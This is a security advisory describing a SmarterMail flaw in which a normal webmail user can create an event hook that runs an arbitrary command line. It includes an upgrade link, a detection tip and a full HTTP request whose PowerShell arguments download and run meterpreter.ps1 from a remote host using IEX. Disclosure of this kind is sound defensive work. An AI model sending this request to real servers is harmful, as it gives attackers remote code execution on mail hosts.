Advisory

Upgrade to the latest version of SmarterMail: https://www.smartertools.com/smartermail/downloads

Technical details

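When authenticated as a “normal” webmail user, it is possible to trigger an event hook containing a PowerShell command that downloads a meterpreter.ps1 file. In the request below, the hook's CommandLineAction sets the process to powershell and passes arguments that fetch the script from a remote host and run it with IEX, so a non-administrative account can supply an arbitrary command line. On an affected installation, reviewing the configured event hooks for unexpected CommandLineAction entries is a practical check.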

POST /api/v1/settings/event-hook HTTP/1.1
Host: test.local:9998
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.
Content-Length: 1004
Origin: http://test.local:9998
Connection: close
Referer: http://test.local:9998/interface/root

{
  "actions":[{
    "constrained":true,
    "constraintFrequency":"00:00:00",
    "constraintKey":"",
    "defaultFrequencyInMinutes":0,
    "eventActionID":0,
    "inputs":[{
      "descriptionResourceId":"@EventInput_Process",
      "hidden":false,
      "inputType":0,
      "key":"process",
      "prefillKey":null,
      "required":false,
      "value":"powershell"
    },{
      "descriptionResourceId":"@EventInput_Arguments",
      "hidden":false,
      "inputType":0,
      "key":"arguments",
      "prefillKey":null,
      "required":false,
      "value":"-ExecutionPolicy Bypass -NoExit \"IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.233/meterpreter.ps1');\""
    }],
    "key":"CommandLineAction",
    "lastOccuredMapping":{},
    "lastOccuredUTC":"0001-01-01T00:00:00",
    "requires":1,
    "showVariables":true,
    "didTrigger":false,
    "id":"",
    "lastInput":{
      "descriptionResourceId":"@EventInput_Arguments",
      "hidden":true	,
      "inputType":0,
      "key":"arguments",
      "prefillKey":null,
      "required":false,
      "value":""
    }
  }],
  "actionsByKey":{},
  "conditions":[],
  "conditionsByKey":{},
  "enabled":true,
  "eventID":30000,
  "groupID":"",
  "isNew":true,
  "name":"_",
  "owner":""
}